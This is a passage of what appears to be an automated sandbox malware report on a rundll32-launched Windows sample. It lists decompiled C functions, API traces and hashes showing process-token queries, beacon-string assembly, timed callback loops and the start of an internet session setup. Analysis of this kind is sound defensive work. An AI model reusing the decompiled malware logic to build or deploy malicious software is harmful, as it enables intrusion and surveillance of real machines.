                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04A49816,?,?,?,?,00000102,04A4937B,?), ref: 04A48D64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04A48D74
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04A48D80
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                • String ID:
                                • API String ID: 3767559652-0
                                • Opcode ID: a21c49e2c2d982612b47fc667f9d16a589902de1004598811785412b702cfbbe
                                • Instruction ID: 531b09048460d97660c68a674f33e56ba851bdf8614f10fdc30d17fa7796e5dc
                                • Opcode Fuzzy Hash: a21c49e2c2d982612b47fc667f9d16a589902de1004598811785412b702cfbbe
                                • Instruction Fuzzy Hash: 7C21067A601215FFDB126F78EC44AAE7FB8EFD6294B058059F9059F210D739ED0187A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A4272D, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04A4272D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E04A41525(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                0x04a42742
                                0x04a42746
                                0x04a42750
                                0x04a42755
                                0x04a4275a
                                0x04a4275c
                                0x04a42764
                                0x04a42769
                                0x04a42777
                                0x04a4277c
                                0x04a42786

                                APIs
                                • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,04E5935C,?,04A45398,004F0053,04E5935C,?,?,?,?,?,?,04A47CCB), ref: 04A4273D
                                • lstrlenW.KERNEL32(04A45398,?,04A45398,004F0053,04E5935C,?,?,?,?,?,?,04A47CCB), ref: 04A42744
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,04A45398,004F0053,04E5935C,?,?,?,?,?,?,04A47CCB), ref: 04A42764
                                • memcpy.NTDLL(74E069A0,04A45398,00000002,00000000,004F0053,74E069A0,?,?,04A45398,004F0053,04E5935C), ref: 04A42777
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlenmemcpy$AllocateHeap
                                • String ID:
                                • API String ID: 2411391700-0
                                • Opcode ID: d233af206818cc2991e719a5a32f0adcb2f05158b3bf19077187ba1ac1fe812a
                                • Instruction ID: 77b1b205a678eb5ffdc4c0ededa4983588c6d621d119afa68111d5cd033e5ba7
                                • Opcode Fuzzy Hash: d233af206818cc2991e719a5a32f0adcb2f05158b3bf19077187ba1ac1fe812a
                                • Instruction Fuzzy Hash: 27F04F76900118BB9F11DFA9CC44CDF7BADEF892947114062FD04D7101E635EA108BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A4A677, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(04E59B08,00000000,00000000,7691C740,04A49DCB,00000000), ref: 04A4A687
                                • lstrlen.KERNEL32(?), ref: 04A4A68F
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                • lstrcpy.KERNEL32(00000000,04E59B08), ref: 04A4A6A3
                                • lstrcat.KERNEL32(00000000,?), ref: 04A4A6AE
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                • String ID:
                                • API String ID: 74227042-0
                                • Opcode ID: 8f2b967c5177cd4a5c72b76545b1196ee685f9e9b4adb77ec8e0abb5444fb20a
                                • Instruction ID: f29c384be251f848e33dd3d813643d64b6a6397c98dbe48ff9959be62a1e8327
                                • Opcode Fuzzy Hash: 8f2b967c5177cd4a5c72b76545b1196ee685f9e9b4adb77ec8e0abb5444fb20a
                                • Instruction Fuzzy Hash: 8EE092375026316797119BE4AC4CC9FBBACEFE96663050416FA04D3110C72ADC028BA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Analysis Process: rundll32.exe PID: 6008 Parent PID: 4908 rundll32.exeCOMMON

                                Executed Functions

                                Function 04289A0F, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 38%
                                			E04289A0F(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E04281525(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E04288B22(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                0x04289a1c
                                0x04289a1d
                                0x04289a1e
                                0x04289a1f
                                0x04289a20
                                0x04289a24
                                0x04289a2b
                                0x04289a3a
                                0x04289a3d
                                0x04289a40
                                0x04289a47
                                0x04289a4a
                                0x04289a4d
                                0x04289a50
                                0x04289a53
                                0x04289a5e
                                0x04289a60
                                0x04289a69
                                0x04289a71
                                0x04289a73
                                0x04289a85
                                0x04289a8f
                                0x04289a93
                                0x04289aa2
                                0x04289aa6
                                0x04289aaf
                                0x04289ab7
                                0x04289ab7
                                0x04289ab9
                                0x04289ab9
                                0x04289ac1
                                0x04289ac7
                                0x04289acb
                                0x04289acb
                                0x04289ad6

                                APIs
                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04289A56
                                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04289A69
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04289A85
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04289AA2
                                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04289AAF
                                • NtClose.NTDLL(?), ref: 04289AC1
                                • NtClose.NTDLL(00000000), ref: 04289ACB
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 2575439697-0
                                • Opcode ID: 2af0910d5207f32fab2d9f3689348078f9b8247bb1e36d835eb8674bc7d23abb
                                • Instruction ID: fb4026a20081c413aa2ffe758d0417e40dfbabb8098c4ec9dac1d375099c5371
                                • Opcode Fuzzy Hash: 2af0910d5207f32fab2d9f3689348078f9b8247bb1e36d835eb8674bc7d23abb
                                • Instruction Fuzzy Hash: B5212AB2A51118BBDB01AF99DC44EEEBFBDEF48740F10801AF901E6150D7759A449BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04289BF1, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 201memorystringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 66%
                                			E04289BF1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				void* _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x428d018; // 0xefcf766a
				asm("bswap eax");
				_t27 =  *0x428d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x428d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 = E0428D00C; // 0xeec43f25
				asm("bswap eax");
				_t30 =  *0x428d2a8; // 0xaea5a8
				_t3 = _t30 + 0x428e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d163, _t29, _t28, _t27, _t26,  *0x428d02c,  *0x428d004, _t25);
				_t33 = E04283288();
				_t34 =  *0x428d2a8; // 0xaea5a8
				_t4 = _t34 + 0x428e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37; // executed
				_t38 = E0428831C(_t91); // executed
				_t96 = _t38;
				if(_t96 != 0) {
					_t83 =  *0x428d2a8; // 0xaea5a8
					_t6 = _t83 + 0x428e8d4; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x428d238, 0, _t96);
				}
				_t97 = E04289267();
				if(_t97 != 0) {
					_t78 =  *0x428d2a8; // 0xaea5a8
					_t8 = _t78 + 0x428e8dc; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x428d238, 0, _t97);
				}
				_t98 =  *0x428d32c; // 0x4d795b0
				_a32 = E0428284E(0x428d00a, _t98 + 4);
				_t42 =  *0x428d2d0; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x428d2a8; // 0xaea5a8
					_t11 = _t74 + 0x428e8b6; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x428d2cc; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x428d2a8; // 0xaea5a8
					_t13 = _t71 + 0x428e88d; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x428d238, 0, 0x800);
					if(_t100 != 0) {
						E04283239(GetTickCount());
						_t50 =  *0x428d32c; // 0x4d795b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x428d32c; // 0x4d795b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x428d32c; // 0x4d795b0
						_t103 = E04287B8D(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x428c28c);
							_push(_t103);
							_t62 = E0428A677();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E0428933A(0xffffffffffffffff, _t100, _v28, _v24); // executed
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E04285433();
								}
								HeapFree( *0x428d238, 0, _v44);
							}
							RtlFreeHeap( *0x428d238, 0, _t103); // executed
						}
						RtlFreeHeap( *0x428d238, 0, _t100); // executed
					}
					HeapFree( *0x428d238, 0, _a24);
				}
				RtlFreeHeap( *0x428d238, 0, _t105); // executed
				return _a4;
			}

















































                                0x04289bf1
                                0x04289bf1
                                0x04289bf1
                                0x04289bf6
                                0x04289bfc
                                0x04289c06
                                0x04289c08
                                0x04289c08
                                0x04289c15
                                0x04289c20
                                0x04289c23
                                0x04289c2e
                                0x04289c31
                                0x04289c36
                                0x04289c39
                                0x04289c3e
                                0x04289c41
                                0x04289c4d
                                0x04289c5a
                                0x04289c5c
                                0x04289c62
                                0x04289c67
                                0x04289c72
                                0x04289c74
                                0x04289c77
                                0x04289c79
                                0x04289c7e
                                0x04289c82
                                0x04289c84
                                0x04289c89
                                0x04289c95
                                0x04289c97
                                0x04289ca3
                                0x04289ca5
                                0x04289ca5
                                0x04289cb0
                                0x04289cb4
                                0x04289cb6
                                0x04289cbb
                                0x04289cc7
                                0x04289cc9
                                0x04289cd5
                                0x04289cd7
                                0x04289cd7
                                0x04289cdd
                                0x04289cf0
                                0x04289cf4
                                0x04289cfb
                                0x04289cfe
                                0x04289d03
                                0x04289d0e
                                0x04289d10
                                0x04289d13
                                0x04289d13
                                0x04289d15
                                0x04289d1c
                                0x04289d1f
                                0x04289d24
                                0x04289d2e
                                0x04289d30
                                0x04289d38
                                0x04289d51
                                0x04289d55
                                0x04289d61
                                0x04289d66
                                0x04289d6f
                                0x04289d80
                                0x04289d84
                                0x04289d8d
                                0x04289d93
                                0x04289da0
                                0x04289dad
                                0x04289db3
                                0x04289dbf
                                0x04289dc5
                                0x04289dc6
                                0x04289dcb
                                0x04289dd1
                                0x04289dd7
                                0x04289dde
                                0x04289de5
                                0x04289deb
                                0x04289df2
                                0x04289df6
                                0x04289e01
                                0x04289e06
                                0x04289e0c
                                0x04289e15
                                0x04289e15
                                0x04289e26
                                0x04289e26
                                0x04289e35
                                0x04289e35
                                0x04289e44
                                0x04289e44
                                0x04289e56
                                0x04289e56
                                0x04289e65
                                0x04289e76

                                APIs
                                • GetTickCount.KERNEL32 ref: 04289C08
                                • wsprintfA.USER32 ref: 04289C55
                                • wsprintfA.USER32 ref: 04289C72
                                • wsprintfA.USER32 ref: 04289C95
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04289CA5
                                • wsprintfA.USER32 ref: 04289CC7
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04289CD7
                                • wsprintfA.USER32 ref: 04289D0E
                                • wsprintfA.USER32 ref: 04289D2E
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04289D4B
                                • GetTickCount.KERNEL32 ref: 04289D5B
                                • RtlEnterCriticalSection.NTDLL(04D79570), ref: 04289D6F
                                • RtlLeaveCriticalSection.NTDLL(04D79570), ref: 04289D8D
                                  • Part of subcall function 04287B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,04289DA0,?,04D795B0), ref: 04287BB8
                                  • Part of subcall function 04287B8D: lstrlen.KERNEL32(?,?,?,04289DA0,?,04D795B0), ref: 04287BC0
                                  • Part of subcall function 04287B8D: strcpy.NTDLL ref: 04287BD7
                                  • Part of subcall function 04287B8D: lstrcat.KERNEL32(00000000,?), ref: 04287BE2
                                  • Part of subcall function 04287B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04289DA0,?,04D795B0), ref: 04287BFF
                                • StrTrimA.SHLWAPI(00000000,0428C28C,?,04D795B0), ref: 04289DBF
                                  • Part of subcall function 0428A677: lstrlen.KERNEL32(04D79B08,00000000,00000000,7691C740,04289DCB,00000000), ref: 0428A687
                                  • Part of subcall function 0428A677: lstrlen.KERNEL32(?), ref: 0428A68F
                                  • Part of subcall function 0428A677: lstrcpy.KERNEL32(00000000,04D79B08), ref: 0428A6A3
                                  • Part of subcall function 0428A677: lstrcat.KERNEL32(00000000,?), ref: 0428A6AE
                                • lstrcpy.KERNEL32(00000000,?), ref: 04289DDE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04289DE5
                                • lstrcat.KERNEL32(00000000,?), ref: 04289DF2
                                • lstrcat.KERNEL32(00000000,00000000), ref: 04289DF6
                                  • Part of subcall function 0428933A: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 042893EC
                                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04289E26
                                • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 04289E35
                                • RtlFreeHeap.NTDLL(00000000,00000000,?,04D795B0), ref: 04289E44
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04289E56
                                • RtlFreeHeap.NTDLL(00000000,?), ref: 04289E65
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                • String ID: Ut
                                • API String ID: 3080378247-8415677
                                • Opcode ID: a7098ec602e98991b817afbe366827c79fc2546056aa3400121d5cb5f585188b
                                • Instruction ID: 47de77962bd2c198d96f129bb0a6e1b57ec847034fabf2d4cee7ae929fd0497e
                                • Opcode Fuzzy Hash: a7098ec602e98991b817afbe366827c79fc2546056aa3400121d5cb5f585188b
                                • Instruction Fuzzy Hash: 24619971312201AFE711AB68FC4CF6E7BA8EB48794F08011DF904D72A1DB29EC499B25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04287C3D, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 150timememoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 83%
                                			E04287C3D(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x428d240);
					_v20 = 0;
					_v16 = 0;
					L0428AF6E();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x428d26c; // 0x2c4
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x428d24c = 5;
						} else {
							_t68 = E04285319(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x428d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E04282C58(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E04289870(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x428d244);
							goto L21;
						} else {
							__eflags =  *0x428d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E04285433();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x428d248);
								L21:
								L0428AF6E();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x428d238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                0x04287c3d
                                0x04287c4f
                                0x04287c52
                                0x04287c5e
                                0x04287c64
                                0x04287c69
                                0x04287dd0
                                0x04287c6f
                                0x04287c6f
                                0x04287c71
                                0x04287c76
                                0x04287c77
                                0x04287c7d
                                0x04287c80
                                0x04287c83
                                0x04287c91
                                0x04287c9c
                                0x04287c9f
                                0x04287ca1
                                0x04287cae
                                0x04287cb8
                                0x04287cba
                                0x04287cbf
                                0x04287cc4
                                0x04287ccf
                                0x04287ccf
                                0x04287cc6
                                0x04287cc6
                                0x04287ccd
                                0x00000000
                                0x00000000
                                0x04287ccd
                                0x04287cd9
                                0x00000000
                                0x04287cdc
                                0x04287ce0
                                0x04287ceb
                                0x04287ceb
                                0x04287cf2
                                0x04287cfb
                                0x04287d02
                                0x04287d0b
                                0x04287d0e
                                0x04287d11
                                0x04287d16
                                0x04287d1b
                                0x00000000
                                0x00000000
                                0x04287d1d
                                0x04287d20
                                0x04287d23
                                0x04287d26
                                0x00000000
                                0x04287d28
                                0x04287d37
                                0x04287d37
                                0x00000000
                                0x04287d65
                                0x04287d65
                                0x04287d6a
                                0x04287d89
                                0x04287d8b
                                0x04287d90
                                0x04287d91
                                0x00000000
                                0x04287d6c
                                0x04287d6c
                                0x04287d72
                                0x00000000
                                0x04287d74
                                0x04287d74
                                0x04287d79
                                0x04287d7b
                                0x04287d80
                                0x04287d81
                                0x04287d97
                                0x04287d97
                                0x04287d9f
                                0x04287daa
                                0x04287dad
                                0x04287db8
                                0x04287dba
                                0x04287dbd
                                0x04287dbf
                                0x00000000
                                0x04287dc5
                                0x00000000
                                0x04287dc5
                                0x04287dbf
                                0x04287d72
                                0x00000000
                                0x04287d6a
                                0x04287d3a
                                0x04287d3c
                                0x04287d3f
                                0x04287d40
                                0x04287d40
                                0x04287d44
                                0x04287d4e
                                0x04287d4e
                                0x04287d54
                                0x04287d57
                                0x04287d57
                                0x04287d5d
                                0x04287d5d
                                0x04287dda
                                0x00000000

                                APIs
                                • memset.NTDLL ref: 04287C52
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04287C5E
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04287C83
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04287C9F
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04287CB8
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04287D4E
                                • CloseHandle.KERNEL32(?), ref: 04287D5D
                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04287D97
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,0428312C,?), ref: 04287DAD
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04287DB8
                                  • Part of subcall function 04285319: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04D79368,00000000,?,74E5F710,00000000,74E5F730), ref: 04285368
                                  • Part of subcall function 04285319: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04D793A0,?,00000000,30314549,00000014,004F0053,04D7935C), ref: 04285405
                                  • Part of subcall function 04285319: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04287CCB), ref: 04285417
                                • GetLastError.KERNEL32 ref: 04287DCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                • String ID: Ut
                                • API String ID: 3521023985-8415677
                                • Opcode ID: 0975a3429029ac45fd00e9c75cce97377fbd4786778a37cf4fddbedf90af53d1
                                • Instruction ID: 986911718efdac3b05138746f9f89c7a8b2dc6f60d300917923454615847c721
                                • Opcode Fuzzy Hash: 0975a3429029ac45fd00e9c75cce97377fbd4786778a37cf4fddbedf90af53d1
                                • Instruction Fuzzy Hash: 91519271A12229AFDF10EF95EC44DEEBFB8EF85320F20451AF411E2195D774AA44DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0428A85C, Relevance: 19.6, APIs: 13, Instructions: 126networkstringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 92%
                                			E0428A85C(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E04281525(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E04288B22(_t56);
					} else {
						E04288B22( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
